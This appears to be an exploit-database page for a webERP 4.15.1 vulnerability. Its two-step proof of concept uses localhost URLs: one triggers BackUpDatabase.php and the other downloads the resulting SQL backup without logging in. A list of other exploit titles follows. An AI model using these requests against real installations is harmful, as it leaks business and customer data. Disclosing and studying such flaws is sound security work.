Weberp 4.15.1 unauthenticated backup file access Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2020-05-05 | Type : webapps | Platform : php
This exploit / vulnerability Weberp 4.15.1 unauthenticated backup file access is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: webERP 4.15.1 - Unauthenticated Backup File Access
# Date: 2020-05-01
# Author: Besim ALTINOK
# Vendor Homepage: http://www.weberp.org
# Software Link: https://sourceforge.net/projects/web-erp/
# Version: v4.15.1
# Tested on: Xampp
# Credit: İsmail BOZKURT

--------------------------------------------------------------------------
About Software:

webERP is a complete web-based accounting and business management system
that requires only a web-browser and pdf reader to use. It has a wide range
of features suitable for many businesses particularly distributed
businesses in wholesale, distribution, and manufacturing.

-------------------------------------------------------
PoC Unauthenticated Backup File Access
---------------------------------------------

1- This file generates new Backup File:
http://localhost/webERP/BackUpDatabase.php
2- Someone can download the backup file from:
--
http://localhost/webERP/companies/weberp/Backup_2020-05-01-16-55-35.sql.gz

Weberp 4.15.1 unauthenticated backup file access


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Weberp 4.15.1 unauthenticated backup file access Vulnerability / Exploit